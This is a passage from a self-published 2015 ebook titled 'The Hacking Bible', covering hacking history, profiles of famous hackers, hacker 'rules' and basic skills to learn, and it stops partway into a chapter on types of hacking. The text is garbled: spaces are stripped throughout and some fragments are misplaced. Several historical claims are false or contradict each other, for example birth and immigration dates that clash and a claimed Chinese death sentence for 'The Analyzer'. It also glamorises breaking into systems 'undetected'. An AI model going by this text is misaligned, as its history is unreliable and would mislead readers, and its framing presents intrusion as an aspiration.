Вы находитесь на странице: 1из 101

THEHACKINGBIBLE:

TheDarksecretsofthehackingworld:HowyoucanbecomeaHacking

Monster,Undetectedandinthebestway

ByKevinJames

©Copyright2015byWECANTBEBEATLLC

TableofContents

CHAPTER1:INTRODUCTION

WhatHackingisallAbout TheHistoryofhacking BestHackersofAllTime

CHAPTER2:HOWTOBECOMEAHACKER

AHackersStyle GeneralHackingSkills WhyDoPeopleHack?

CHAPTER3:TYPESOFHACKING

WebsiteHacking

EthicalHacking

NetworkHacking

EmailHacking

PasswordHacking

ComputerHacking

OnlineBankingHacking

CHAPTER4:HACKINGANDNON-HACKING

HackersandtheLaw

HowdoHackersAffectOurLives

HowtoKnowifYou’reHacked

HowtoprotectYourselfFromHacking

CHAPTER5:ADVANTAGESANDDISADVANTAGESOFBEINGA

HACKER

CHAPTER6:HACKINGTOCHANGETHEWORLDPOSITIVELY

AnAnonymHackerWhoCouldSavetheWorld(basedonrealcase)

CHAPTER7:HACKINGTIPSANDTRICKS

CONCLUSION

HackEthically

CHAPTER1:INTRODUCTION

WhatHackingisallAbout

WWW,andthat’showanewworldbegins…

It’sWorldWideWeb,aworldthatiscreatedbyhumansandwhereinthe21 st century,thecenturyoftechnologymostofthepeoplearemorepresentinthe WorldWideWeblivingtheirlivesthereandquittingthereallifeduetothe advantagesthatWorldWideWebisofferingthemalmostforfree.

Technologyisascienceofanensembleofmethods,processesandoperations thatareusedinordertoobtainaproductoraresultandasFrancisBaconsays, knowledgeisalreadypowerandtechnologyisknowledgesotechnologyisthe biggestpowerofourcentury,apowergives us a great opportunity to do our dailytaskswithoutputtingabigquantityofeffortandwithoutrunningfrom placetoplacejusttofinishourtasks,technologygivesusabigpaletteof servicessuchasaccessinganyinformationanytime,anywhere,gettingintonew virtualworldsbasedondifferentdomains,communicatewithpeoplefromother countriesorcontinentsjustwithaclick,payingbillsfromhomeandmuch more thanthat

Technologyisgreat,ofcourse,andweallloveitbecauseit’smakingourlives easierandmoreenjoyablebutasanyotherthingitaslongasithasadvantagesit hasalsodisadvantagesbecauseonceyouputyourinformationontheinternet youareexposingyourperson,yourpast,presentandmaybealittlepartofyour future accompanied by your whole package of information that could be accessedbyotherswhobreakthesecurityrulesandinthatwayyoucanlose basicallyeverything,butasarulethatlifeinputsifyoudon’triskyoudon’twin.

Nowadays,alotofpeoplesteal.Someofthepeoplestealfeelings,breakothers peopleheartsandlives,someofthepeoplestealphysicalstuffsuchascars, bags,walletsandhousesbutarethosepeopletheonlytypesofoffendersinthe world?!Theanswerisno,theyaren’t.Thereisanothertypethatisgrowingday bydayandthistypeisrepresentedbyhackers.Hackersarepersonswhoare passionateandattractedbyknowingeverythingindetailaboutthecybernetic systems,especiallycomputersystems.Despitetheconceptionthathackersare personswithevilintentionsthatwanttoruntheworldsomedaybytheirown conceptions, their passion for details and understanding them most of the hackershaveaprofessionalgoalandtheydon’tusetheirknowledgetoseekand

exploitweaknessinacomputersystem.

Hackingistheoperationwhereyouneedacomputertouseinordertoget

unauthorizedaccessintoasystemwhichcontainsinformatics.

Thiskindofdefinitionislosingthemostimportantaspectsofaculturethat powerfullyhelpedustomakethe21 st century,thehightechnologycentury.In

hisversion1.0.0,ahackerwasapersonfullofpassionreadytogiveanewsense

toeverythingaroundhim.HisbirthwasatTechModelRailroadClubinthe50’s

whenthecomputerswerewaymoredifferentthanwhatwehavetodayandthe

bestofthemarestillmeetingat‘’hackerspaces’’wheretheyorganizemarathons

ofhackingwheretheyarecollaboratingandinteractingwitheachothertofinda

modernsolutionforaproblem.

Inthe90’s,ahackerwasagoodintentionedpersonwhoownslargeskillsinthe

domainbutastimeflies,peoplestartedtouse‘’hacker’’describinganoffender nowadaysbecauseapartofthehackersafterresolvingproblemstheystartedto use their knowledge in an opposite way, creating real monsters who access people’sprotectedcomputersandfilesandthistypeofhackersarecalled“Black

Hat”hackersalsoknownascrackersandthe90’sbasichackerversion1.0.0is

callednowadays“WhiteHat”hackers.

So,whenyouaresabotagingaperson’scomputeryouarebasicallyhacking

them.

Earlyin1971,JohnDraperwhowasacomputerpassionatediscoveredaboxof

cerealsforchildreninwhichwasincludedatoywhistlethatit’sreproducinga

2600-hertzaudiotonewhichwasnecessarytobeginatelephonelineandthat

markedthemomenthestarteddoingphonecalls,heendedupbeingarrestedfor

phonetampering.

SixyearslaterSteveJobsandSteveWozniakbothmembersoftheHomebrew ComputerclubofCaliforniawereatthebeginningofcreatingoneofthebiggest technologycompaniesintheworldbutbeforethat,amysteriousdevicehasjust appearedonthemarket,itwasknownas‘’thebluebox’’anditwascreated having as a base the discovery from 71’s about generating tones that were helpingthepeoplehackintothephonesystems.Howgreat!Justimaginegoing backintimeandtakingpartathowabigcompanyistakingbirthandgrowing sale by sale. Who ever thought that those boxes will be such a worldwide success?!Ithinknoone.

TheHistoryofhacking

Looking back to the 86’s when hacking was officially a crime due to an organizedcongresswhereComputerFraudandAbuseActandtheElectronic CommunicationsPrivacyActagreedthatit’sacrimeto‘’violate’’computer systems.TwoyearsearlierEricCorleystartedabusinesswithamagazinecalled

“2600:TheHackerQuarterly”wherehewaspublishingabouttelephoneand

computer hacking and this magazine it began in short time a guide to the hackers.

Onlyoneyearlater,thepeople’ssystemsofcommunicationsandtheirtelephone networks were very close to a possible end of technology back then, a big damagethathadtoaffectthewholenationwasnearlymadebyHerbertZinn whowaslivinginChicagoalsoknownbythenicknameof‘’ShadowHawk” hacked from his bedroom the AT&T’s computer network and broke in the

system,afterthathe’sgotarrestedatonly17yearsold.

InthesameyeartheydiscoveredthefirstviruswhichwascalledBrainknownas

MS-DOSaffectingthecomputer’ssystemanditwasreleasedontheinternetand

theunluckyownersofthevirushada‘’specialfile’’createdontheirharddrive

thatwasgivingtheircontactinformationfor“BrainComputerServices”which

waslocatedinPakistan.

Abigshotcamein1988whenastudentreleasedthefirstself-replicatingvirus

that can affect over 6000 systems and the big problem was with this virus becauseitwasshuttingdownthenetworksystemforabouttwodays.Itwas speciallydesignedtohacksecurityholesintheUNIXsystems,thisviruswas inventedbyRobertMorriswhograduatedfromCornellUniversitybeforehe releasedthevirus.

Afterthebigshotwithonlytwoyears,TheElectronicFrontierFoundationis takingbirthandit’smajorgoalwasprotectingandtakingcareoftherightsofthe people which were accused of computer hacking. Also, "Legion of Doom" whichwerefourmembersformingabandinSoutheasternUnitedStatesare gettingintothenetworkandcomputersystemsof

BellSouth's911emergencystealingtechnicalinformationthatcouldaffectthe

911serviceintheUnitedStatesandtheyendedupbygettingarrested.

TheSecretServicecooperatedwithArizona'sorganizedcrimeunitdeveloped Operation Sundevil, a big national project having as goal hunting down the computerhackers.Whatayear!

Gulf War was also affected by hacking culture; a group formed by Dutch

Teenagersbrokeintothecomputernetworkin1991andgotunauthorizedaccess

getting important information about the war and its plan of operations and personalinformationaboutthemilitarieswhowereparticipatingandsomeexact numbersaboutthemilitaryequipmentthatwassenttoPersianGulf.Hackers representedamajorprobleminthatpieceoftimebecausebyhackingtheywere abletomakehistorybychangingmilitaryoperationsplansandbymakingpublic someofthetop-secretdocuments.

AstheGulfWar,NASAandtheKoreanAtomicResearchInstitutegothacked

bytwoteenagersknownas"DataStream"and"Kuji"brokeintoabignumberof

computersystemsdirectedbythetwoinstitutionsandafterlongtimeresearches

somedetectivesfromScotlandYardgotthetwohackersthatweresoaffected

emotionallyandendedupcryingwhencaptured,theyturnedthewholemission

intoabigdramamixingfeelingsandemotionswithskillsandknowledge.

Even the British Queen got hacked! and many important persons form the BritishgovernmentsuchasPrimeMinisterJohnMajorandimportantmilitary commandants under secret missions got hacked by a employee at British Telecomwhohackedacomputernetworkwhichcontainedalltheabovepeople numbers,thenumberswerepostedontheinternetafterthediscoveryandthe hackergotcaughtbySecretServicesincooperationwithPolice.TheCitibank

gotamassivedamagecausedbyhackersin1995whenVladimirLevingot

illegallyusinghisownlaptopinCitibank’scomputernetworkwherehestarted totransferbigsumsofmoneytodifferentaccountsaroundtheworldthatwere supposed to be his accounts and the exact number of money stolen and

transferredisstillamysterytodaybutit’sestimatedbetween$3.7-$10million,

afterthisbigshothe’sgotarrestedinBritainwithapunishmentof3yearsin

prisonandanordertopayCitibank$240,000.

AccordingtoareportreleasedbyTheGeneralAccountingOffice,250,000times

onlyin1995hackerstriedtogetillegallyintoDefenseDepartmentfileswhich

includedpreciousdataanddocuments,65%oftheattendantsalreadysucceed.

Hackerswereateverystep,CIA’sagentsnoticedamajorchangeappliedtothe

websitemadebyagroupofhackersknownasSwedishHackersAssociationwho

changedtheorganization’snameinto"CentralStupidityAgency."

1997representedanimportantyearinHackingHistory,thefirsthacking

programwasreleasedwiththenameof "AOHell",forfewdaysAOLnetwork

wasputonpauseandhundredsofthousandsofuserswerefoundingintheire-

mailsmultiple-megabytemessagesalso,chatroomsgotinvadedbyabunchof‘’

spam’’messages.

TheSymantecAntiVirusResearchCenterwhichwastheheadofsecurityand antivirussoftwaregavethenationareporttellingusthattheyaremorethan

30,000computervirusesfree,travelingandcirculatingwithoutanyrestrictionin

theVirtualWorld.Asanyotherdomain,aviationisalsobasedontechnologyand theuseofcomputersareateverystepevenintheairwheretherearethree computersoneachplane’sboardandeachofthemiscommunicatingwithother computersthatbelongtotheairtrafficcontrollers,withouttechnologyaviation

wouldbe80%dead.

For the first time in aviation bright history, in 1998 aviation’s got the first massiveattackfromhackers,BellAtlanticairportcommunicationssystemin Worcester,Massachusettsgothitdownbyahackerwhichcausedabigdamage byinterruptingthecommunicationsbetweenairplanesandtheairportformore thansixhoursbuthappilytherewerenoaccidents.Informationsharedwiththe public are telling us he’s a boy but they aren’t giving any other personal informationsuchasnameandage.

HackingcanbedangerousfortheBlackHathackersanditcanbringthemthe

death,inthesamesituationwerein1998threeteenagers,twoofthemform

Cloverdale,Californiaandthethirdofthemwhichwastheheadofthegroup,an Israeliteenagerknownas"TheAnalyzer”gotasentencetodeathbyacourtin China after breaking into computer network systems belonging to federal agenciesandbanks.

E-baywashighlyaffectedin1999,exactlyinMarchbyhackingwhenahacker

knownasMagicFX breaksintothe sitedestroyingthe site'sfrontpage,the companywassoaffectedbecauseMagicFXwasabletochangeifhewantedto theprices,addinexistentitemsforsaleandredirectthewholeonlinetrafficto anothersite.TheSymantecAntiVirusResearchCentergivesusanotherreportin

2000estimatingthatineachhourofthedayonenewvirusisbornandleftfree

tocirculateintheVirtualWorld.

Loveisagreatfeeling,it’safreegiftfromlifetousthatwecouldopenevery day,ineveryhourandeverysecondbutdoesloveonlycomeinthisform?No! it’snotbecausethereisalsoan "ILoveYou"viruswhichshowedupintheMay

of2000inPhilippinesthencontaminatingthewholeworldinamatterofhours.

Beforeanysolutionwasfoundit’sestimateddamageabout$10billionlostfiles

worldwide,howtrickylovecouldbeifyoudon’tprotectyourself.

Laterin2001inMay,theseveralU.S.governmentsites,DepartmentofHealth

andHumanServicesandtheCentralIntelligenceAgencywerehackedbycouple groupsofChinesehackerscausinginformationlackandmodifyingdata.Inthe same month, Microsoft websites got interrupted by attacks from DDOS- distributeddenial-of-service.

BestHackersofAllTime

Despitetherichanddiverseculture,asanyotherdomain,hackingownsatopof

hackerswhomadethebiggesthacksintheworld,andit’shardtobeontop

becausetherearemillionsofhackersbutonlythebestskilledofthemsucceed,

therestarejustapartofpeopleusedtomakethesuccessfulhackersshineeven

more.Infact,beingsuccessfulisnotevenagoal;successfulpeoplearepeople

whodoeverythingwithpassionandhardworknomatterhowhardthesituation

isandsuccessisacollateraleffectyouget,notagoal.

GaryMcKinnonwasbornon10 February1966inGlasgow,Scotland,hehas alwaysbeencuriousandpassionateaboutcomputersandinformatics,whichis totallygreatifyoufollowyourdreaminthisdomainofscience.Grayisliving rightnowinLondonandheisknownasahackerfortheoperationhedidin

2002called"biggestmilitarycomputerhackofalltime"whenheusedtoput

downtheUSMilitary’sWashingtonNetworkofabout2000computersfor24

hoursandthat’showhereceivedthetitleof“Thebiggesthackerofalltime”,his curiositystronglymadehimtobreakintoNASA’s computersjusttoget information onUFOs,hewantedtomakesurethatheisgettingitrightfromthe

source.Heillegallyaccessed97USMilitaryandNASAcomputersbydeletinga

coupleoffilesandinstallingavirus.Everythinghemadewasjusttosatisfyhis curiosity.Thewholehackwasfromhisgirlfriend’saunt’shouseinLondonusing thename“Solo”.Morethanthat,afterhackinghepostedamessageontheUS Military’swebsitesaying“Yoursecurityiscrap.”Andcontinuedhackingbutat theendheadmittedthatheleftathreatononecomputerafteranotherhack saying“USforeignpolicyisakintoGovernment-sponsoredterrorismthesedays …ItwasnotamistakethattherewasahugesecuritystanddownonSeptember

11lastyear…IamSOLO.Iwillcontinuetodisruptatthehighestlevels…“.

Rightnow,Grayishappywithhistitleandbyfollowinghisdreamheismore

thanpleasedworkingasasystemadministrator,agreatexampleofamanwhois

happybecausehefollowedhisdreams.

LulzSec or Lulz Security is an important group of hackers due to their realizations,theyareagroupwithelevenmembersandsevenvolunteers and theyaredoinghighprofileattacks.

Their motto is

"The world's leaders in high-quality entertainment at your

expense","Laughingatyoursecuritysince2011"andtheirmaingoalisshowing

thegiganticcompaniestheirlackofsecurityandabsenceoftakingcareoftheir

personaldata.TheyhackedS

ony,NewsInternational,CIA,FBI,ScotlandYard,

andseveralnoteworthyaccountstoshowthemhowtheycanplaywithother people’s information. By hacking, they were having lots of fun and a demonstrativeattackiswhentheybrokeintoNewsCorporationsaccountposting

areportaboutthedeathofRupertMurdochon18July2011whichwastotally

fake.

Also,theyhavecreatedanASCIIgraphicusedbytheminitsChingaLaMigra

torrent,here’showthegraphiclookslike:

./$$ /$$/$$$$$$

.|$$|$$ /$$

.|$$/$$/$$|$$/$$$$$$$$|$$ \ /$$$$$$/$$$$$$$

.|$$|$$ |$$|$$|

.|$$|$$ |$$|$$/$$$$/ \

.|$$|$$ |$$|$$ /$$

.|$$$$$$$$| $$$$$$/|$$/$$$$$$$$| $$$$$$/| $$$$$$$| $$$$$$.$

.|

$$

/

/$$/|

//$$

/|

$$$$$$ /$$ $$/$$

$$|$$$$$$$$|$$

\$$|$$

/\

/|$$

/ \

/

/\

/|

/\

/

//Laughingatyoursecuritysince2011!

AnotherimportantfigureinhackingworldisrepresentedbyAdrianLamo;he

wasbornonFebruary20,1981inBoston,Massachusettsandheismixedrace

(Colombian-American)heisknownasaformerhackerandthreatanalyst.Lamo doesn’townahighschooldiplomaandhewasoftencalled“HomelessHacker” becausehelovedtosurf,travel,exploreabandonedbuildingsandgotothe internet cafes, libraries and universities to discover network and look after details,exploitingsecurityholeswasalwaysahobbyforhim.

Lamofirstgotmediaattentionwhenhedecidedtochangecareersandrealized his skills in hacking. He hacked big companies such as Yahoo!, Microsoft,

Google,andTheNewYorkTimesandintwothousandandthreehe’sgothis firstarrest.Intheprison,hestudiedandaftergettingfreehe’sgotabatchofan AmericanThreatAnalystwhichallowshimtobreakintoaccountssittingis spaciousplacessuchascafeterias.Lamoisoneofthebiggestexamplesshowing usthatschoolisnotlearningyoueverythingandthemainproblemofschool nowadaysisthebigamountofinformationschoolisgivingtothestudentsin different domains in order to let students choose a domain they love and specializeonlyonit.

NumberfourinthistopistakenbyMathewBevanandRichardPryce,two

hackerswhichcaseissimilartoGray’scase.MathewBevanwasbornin

aBritishHackerborninCardiff,Waleshe’sgothisfirst

sentenceandarrestin1996afterbreakingintosecureU.Sgovernmentnetwork

protecting himself with the nick name “Kuji”, Mathew wasn’t very good at schoolandheusedtheinternettoescapeformthereallife,inthiswayhe formedadoublelife,thefirstonewithordinaryactivitiesatdayandthesecond lifewithnightactivitiesbasedoncomputersandnetworking.MathewBevanand RichardPrycecreatedmanydamagesbetweenUnitedStatesofAmericaand NorthKoreaastheyusedtohacktheMilitaryUscomputersandinstallingon themforeignandstrangesystems.ThecontentsofKoreanAtomicResearch InstituteweredumpedintoUSAFsystem.

JonathanJosephJames(December12,1983–May18,2008)isanAmerican

hackerfromNorthFloridaandheisthefirstjuvenileinprisonduetoacyber-

crimehedidatageof15.Hisactionnameis“c0mrade”andhebrokeinto

DefenseThreatReductionAgencyofUSdepartmentandheinstalledsoftware that controlled the messages passed on though conversations between the employeesofDTRAandhealsocollectedtheusernamesandpasswordsand otherdetailsofemployees.Morethanthat,hestoleimportantsoftware.NASA

paidfromitswallet41,000$toshutdownitssystem.Jonathanendedhislife

committingsuicidein2008.

NumbersixisKevinPoulsenandhishackstoryisthefunniestsofar.KevinLee

Poulsen(bornNovember30,1965)wasborninPasadena,Californiaandheisa

blackhathackerbecauseheusedhisskillstogetoneofhisintereststrue,heis currentlyworkingasadigitalsecurityjournalist.Wouldyoudoanythingto followyourdreams?Inhiscasetheanswerisyes,sofromdreamtopracticewas onlyastepandhemadethisstepbyhackingaradioshowpoweredbyLos AngelesradiostationKIIS-FM,thegamerulesweresosimple,the102 nd caller

June
June

10,1974andheis

willwinaprizeofaPorsche944S2andKevinwantedtomakesurethathewill

betheluckycallersohehackedintotheirphoneline.Knownas“DarkDante”

hewentundergroundwhenFBIstartedtofollowhimbuthewascaughtand

arrestedwithasentenceoffiveyears.Andnooneknowswhathappenedwith

thecar.

KevinDavidMitnickwasbornon6August,1963inLosAngeles,California,he

wascalledonceas‘’themostwantedcyber-criminalofUS,buttimeandwork transformed him into a successful entrepreneur. Kevin is also an important hacker;hebrokeintoNokia,MotorolaandPentagon.He’sgotmediaattention

whenhewasarrestedin1999and1988,hehadtwohacknames“

TheCondor,

TheDarksideHacker”andafterspendingfiveyearsattheprisonheopeneda

securitycompanynamed

MitnickSecurityConsulting.

Attheageof15heshowedhisinteresttosocialengineeringandhestartedto

collect information including user name, passwords and phone numbers. Nowadays,heisworkingasacomputersecurityconsultantbutinthepasthe usedtoworkasareceptionistforStephenS.WiseTemple.

NumbereightistakenbyAnonymous,oneofthemostpopularmovesfromthe last years, the group was born in 2004 on the website 4chan, it’s more an ideologyanditrepresentsaconceptinwhichfewcommunitiesofusersexistin an anarchic society and they are fighting for internet freedom against big corporations. The members are wearing Guy Fawkes masks and they are attackingreligiousandcorporatewebsitesinspecial.Theyhavetargetssuchas TheVatican,theFBI,andtheCIA,PayPal,Sony,Mastercard,Visa,Chinese, Israeli,Tunisian,andUgandangovernmentswhichtheyalmosttouch.Manyof thememberswishtocontroltheVirtualWorldsomeday.

AstraisthecoverofaGreekmathematicianwhois58yearsoldandit’swell

knownduetothedamageAstracausedtotheFrenchDassaultGroupin2008.

Astrahackedintotheirsystemandstoleweaponstechnologydataandforfive yearsAstrasoldthedatatofivecountriesaroundtheworld.Officialsourcessay thathehadbeenwantedsince2002. Astra’shappinessmeantDassaultsadness

becausethedamagecausedtoDassaultwasabout$360millionswhileAstrawas

sellingdatatomorethan250peopleallaroundtheworld.

And the last place in this top is taken by Albert Gonzalez, an American computerhacker;I’dcallhimTheMasterHackerofinternetbankingbecausehe

stolemorethan170millioncreditcardsandATMnumbersintheperiod2005-

2007.HeisoriginallyborninCubain1981butheimmigratedtotheUSAin

70’sandhe’sgothisfirstcomputeratageof 8.

Aftermanyattackshe’sgotarrestedonMay7,2008andgotasentenceof20

yearsinFederalprison.

CHAPTER2:HOWTOBECOMEAHACKER

AHackersStyle

Hackersarepeoplewhoenjoytheiractivitybothmentallyandpractically,they areproblemsolversandnewsoftwarebuilders,theyareconfidentandbelievein

volunteerworkandfreed0m,oneoftheirbasicrulesthatweshouldalsoadopt

practicallyandnotjusttheoreticallyishelpingeachotherwhenit’sneeded,yes,

hackershelptheirmateswheneverisneeded.Tobeacceptedintheworldof

hackersitdependsonlyonyou,dependsinthebiggestpartonyourattitude.

Hackerstrytounderstandeverypieceofaproblemandthenfindorcreatethe

bestsolution,themotivationofbeingahackershouldcomefromyourinside

withoutanyinfluencebecausetheonewhoisgoingtobeinthesituationisyou,

andnooneelse.Beinganoriginalgoodhackerisamind-set.

Butinthecommunityofhackersthereareafewrulestorespect,andherethey

are:

Thefirstruleisaboutyourconnectionwiththeworld,intherealworldproblems

can’tbestoppedandyouhavetothinkaboutthesolutionforeveryproblemand

stronglybelievingthereisasolutionforeveryproblem,andifthereisnotyou

shouldcreateone.Hackingworldisabsolutelyfascinatingonceyoudiscoverit

andyouunderstanditandforahackerthisworldshouldbetheonlyone,hackers

havetonsoffunbydoingtheiractivitybutnoonetellsaboutthatkindoffun,is

thekindoffunwhereyouhavetoworkandputalotofeffortbyexercisingyour

ownintelligenceinordertosucceed.Asahackeryoushouldratherresolvea

problemthancomplainingabouthavingaproblem,hackingisinfactalifestyle.

Thesecondruleisamatterofperfectionism;youshouldbelievethatonceyou solveaproblemthereisnoneedtodoitagainbecauseyoualreadydiditinan idealway.Jumpingintosolutionisn’tasolution;youhavetothinkatleasttwice beforeyougetinaction. Tobehavelikearealhackeryoushouldnotwastetime onfindingtwosolutionsforthesameproblem,remember?Therearealotof problemsthatneedstobesolved.Thethirdruleistellingusabouttheevilwork andboredom,theycouldseriouslyaffectyouractivityasahackersotheyare categorizedasbeingevil.Oneofthebestwaystolosethecontactwithevolution andinnovationistobecomerepetitive.Ahackerisalwayscreativeandreadyto buildnewstuffandifyouareassaultedbyboredomitmeansthatyouarenot doingyourjobasyouweresupposedto,whilebreakingthefirsttworules.

Freedomisthebest,that’sthefourthrule;everyonelovesfreedommorethan anythingbuttheyrealizeonlywhentheylooseit.Hackersdon’thaveaboss, hackersaretheirownleadersanditdependsonlyontheirpersoniftheywantto progressornot,butifwe’retalkingaboutarealhackerthenhewillalwaysbein abubblethat’sgrowing.Leaveborderssomewherefar,youhavetobeveryopen minded in order to be a real hacker which means you should accept new conceptsandideasandworktorealizethem,youshouldmakeyourownrules,a setofruleswhichisgoingtoimproveyourcreativity,asetofrulesthatshould allowyoutodowhateveryouwantandwheneveryouwant.Listeningtoorders mustbeexcludedfromthestart;themainideaisaboutresolvingproblemswith yourownconcepts.Whatareyougoingtoachieveifyouarelisteningtoothers ideas?Nothing.It’sworseifyoupracticetheirideas,sobefreeasabirdinthe sky.Attitudecan’thidethelackofcompetence;thisisthelastruleyoushould respect.Tobehavelikeahackeryoushouldhaveacompatibleattitudebutdon’t forgetaboutthecompetenceandtheskills!Anexcessofattitudeisnotgoingto turnyouintoarealhacker,isgoingtoturnyouintoacelebrityorachampion athlete.Hardworkistheultimatekeyofsuccessthatwillhelpyouopendoorsin theworldofhackers,forbeingahackerisneededtohaveintelligence,practice

anditrequestsalotofconcentration,alsoyoumustbe100%dedicated.

Thoserulesaregoinghandbyhand,andifyoubrokeoneruleyouaregoingto

breakthemall.Respectisthepriority,itallstartsandendswithyou,ifyou

reallyrespectyourselfthenyoushouldrespectyourchoicesaswell.

Ithinkthoserulesareasolidbaseforanysuccessfulpersonandrespectingthem wouldguideintoabrightsocietywithresponsiblepeople.Unfortunately,we havetocreatecommunitiesandsmallerversionsofsocietiesbecausethereisa verylimitednumberofpersonswhorespectrules.Idealismdoesn’tcomeinbig sizes. Differences between people are meant to be, strong people help wear peoplerealizehowincompetenttheyare,poorpeoplemakerichpeoplefeeleven richer,unhealthypeoplemakehealthypeopletheirluckandviceversaineachof theabove,that’showtheworldworks…

GeneralHackingSkills

Whenyoubuildahouse,youshouldhaveastrongbase;it’sthesameifweare

talkingabouthacking.Youneedabaseinhackingtoosotherearefewhacking

skillsthatarebasicskillsandIamgoingtopresentthemtoyou:

Firstofall,youshouldknowhowtoprogramandifyoudon’tknowyoushould

learnasfastaspossiblebecausethat’sinahacker’sbasicpackage.Programming isthemainskill,ifyouareabeginnerandyoudon’tknowwhatacomputer languageisaboutthenstatusingPython,it’sverygoodforbeginnersbecause everythinginPythonissoclearandit’sverywelldocumented,I’dpersonally

sayitwasdesigned50%forbeginnersduetothesimplicityyoucanworkwith.

YoucanfindhelpfultutorialsatPythonwebsitehttps://www.python.org/.

Afterlearningsomebasicprogramming,youwillprogressandIrecommend

learninghowtoworkwithC,thecorelanguageofUNIX,furthermore,ifyou

knowtoworkwithCitwouldnotbecomplicatedtoworkwithC++because

theyareveryclosetoeachother.

Thereareotherprogramminglanguagesthatareimportanttohackerssuchas PerlorLISP.Perlisthebestoptionifyoulovepracticeworkdespitethis,Perlis usedalotforsystemadministration. LISPishardertounderstandbutonceyou getityouwillbeveryproudofyourselfandexperiencedbecauseitwill definitelyhelpyoutobeabetterprogrammer.

Actually,onlyknowingtheprogramminglanguagesisnotenoughbecauseyou should exercise with your self to think about programming and solving the problemsinabigwaywithoutalotoftimeneeded.

Programmingisnotaneasyskillsoyouhavetowriteandreadcodesandrepeat

themuntilyougetacertainmeaning.

LearneverythingaboutHTML

HTMListheWeb’smarkuplanguageanditmeansHypertextMarkupLanguage,

it’sveryimportantbecauseyoulearnpracticallyhowtobuildawebpagefrom0

andit’shelpingalotifyouareatthestartofprogrammingbecauseit’scodes

willrunyourmind.

WritinginHTMLdefinitelyopensyourhorizonsandmakesyouthinkeven

biggerthanbefore.WhatIloveaboutHTMListhatyouareabletocreate

anything,youcanwrite,youcancreateimagesandformsasyoulikeonlyby

knowingthecodes.

Englishlanguageisamust

Thisisaninternationalkeyofcommunication,everythinghasanEnglishversion

tooevenifit’snotthemotherlanguageinthecountry.

IfyouarenotsureaboutyourEnglishskills,youshouldmakethematleast

perfectasfastasyoucanbecauseEnglishismainlanguageinhackercultureand

ontheinternet.StudiesshowthatEnglishhasthebiggestandrichesttechnical

vocabularythananyotherlanguageoftheglobe.Grammaristhekeytoopenthe

Englishworld.Goforit!

Learningcomputernetworking

Becauseyouaredefinitelygoingtobreakintowebsitesandnetworkresources,

it’saveryimportantandusefulskillbecausetherearealotofwaystohacka

websitebutit’salldependingontheserverandonthetechnologythatthesite

usessuchasASP.net,PHP,etc.

Therearesitesspeciallydesignedforhackerswhichwilltakeyouonalong

roadfromSQLinjectiontoXXSattacks,justtomakesureyouhavelearned

everything.

everything. LearnUNIXandLinux

LearnUNIXandLinux

UNIXrepresentstheoperatingsystemontheinternetandifyoudon’twanttobe

ahackerthisisnotamust,butifyouaregoingtobeahackeryoushouldlearn

andunderstandit.Linuxisanothercomputeroperatingsystemandyoucanget

veryclosetoitbydownloadingandusingitonyourownmachine.

Togetagreatexperienceinprogrammingandalsogoodskillsrunthesystems,

understandthem,readthecodes,modifythecodesanddoitalloveragainand

don’tforgettohavefunwhilelearning.

So,thosearesomegeneralhackingskillsandifyouaregoingtotakecareof

themandputtheminpracticeyoushouldbecomeahacker.

WhyDoPeopleHack?

Oneofthefrequentquestionwhenitcomesabouthackingiswhydopeopledoit

andthereisabigpaletteofreasonsaboutthissubject.Manypeopleaskthis

questionwithoutevenknowingwhatahackisabout.

Somehackershackjustforhavingfun,theybreakintowebsites,serversand networksystemsfortheirentertainment,otherhackersdoitbecausetheyliketo be in the center of someone’s universe and they get there by hacking into differentstuffandtheycandoitalsotoprovesomeonesomethingatamoment oftheirexperiencesashackers.Theyalsoenjoydoingitbecauseit’slikeamind puzzlewhereyouarefreetoputanypieceasyouwantbutyouknowithasto workandthat’swhyhackersfinditextremelysatisfyingtohack.Hackersare

alsoentertainedbyspyingonfriendandfamilyandwhynotonbusinessrivals.

Therearehackerswhohackasystemjusttogetvaluableinformation,othersare

interestedinstealingfilesorservicesinordertosellthemlaterandgetmoney

onitandabigpartofhackingadeptsareinthiscategory.

Manyofthehackersarepoweredbytheirownsystem,theycouldbepowered

bycuriosity,andtheyareverycuriousaboutnewsystemsandveryinterestedin

updatesandITstuff.Manyofthecurioushackersworkforcompaniesespecially

toprobetheircomputersystemsbyhackingthemandthentheyinformthe

systemadministratorabouttheweaknesstohelphimimprovehissecurity.

Moneyisanotherreasonforhacking;someofthepeoplebecomehackersjustto

beabletomakemoneyformhackingtechniquessuchasgainingentrytoservers

thatcontaincreditcardsdetails.

Yourcomputermaybehackedifyounoticethatabigamountofmemoryis

taken,hackersalsohacktouseothercomputersinactivitiessuchasdepositing

piratedsoftware,piratedmusic,pornography,hackingtoolsetc.Theycanalso

useyourcomputerasaninternetrelayorasapartofaDDoSattack.

An important reason is disrupting, some of the hackers break into target companiestodisruptthebigbusinessjusttocreatechaosandtoshowthemtheir absenceoftakingcareaboutsecurity,mosthacksofthistypearepoweredby hackergroupssuchasLulzSec.Scientistssaythathackersmighthaveadisease knownasAspergerSyndrome(AS)andthevictimsarepeoplewhoaren’tgood atsocialrelationshipsbutownaspecialcapacitytofocusonnumbersandhard problemsforalongtime.

Mostofthetimeshackersarecategorizedaschallengeloversandhackinghasa strongconnectionwithchallengingbecausebasicallywhenyouarehackingyou are challenging yourself to try new things, to solve the most complicated problemsandifyouwillsucceedonceyouwon’tstop,becausethatiswhatis hacking about, so you are always putting yourself in front of intellectual challenges.

Thosearethemostcommonreasonsthataredeterminingpeopletohackand

theirinteriorpowerishelpingthemtotransformintorealhackmasters.There

arepeoplewhohackfortheirpersonalinterestsjustlikeKevinPoulsenwhogot

hisdreamcarbyhackingandofcourse,therearestillunknownreasons.

CHAPTER3:TYPESOFHACKING

Ineverycountryontheglobeyouwillfindanownculture,lifestyle,foodstyle, traditionsandpeopleandtherewillneverbetwocountrieswiththesameculture ortraditionsbecausethosearethemainfeaturesthatmakesacountryunique. You will meet in your life different types of people, you will meet pacifist people,qualitypeople,lowqualitypeopleandthelistcancontinue,it’sthesame ifwetakeasecondandthinkalittlebitabouthacking,therearedifferenttypes of hacking and each type specializes and focuses on something, there are differentgoalshackerstoreachineverytypeofhacking.

Intheendyoucancategorizepeoplebytypes,hackersdoexactlythesamein

theirworld,andtheycategorizetypesofhacking.I’dsaythattypescreatedby

reasonsandonceweknowthereasonwecancategorizeahack.

Therearesevenbigtypesofhacking,thefirstoneiswebsitehackingandit’s

usuallyusedtohackintobigbrands/companieswebsites.Thesecondtypeof

hackingispasswordhackingandhackersdoitinthiscasetocollectinformation

orgetaccesstoanimportantdocumentandothersdoitjustforfunpoweredby

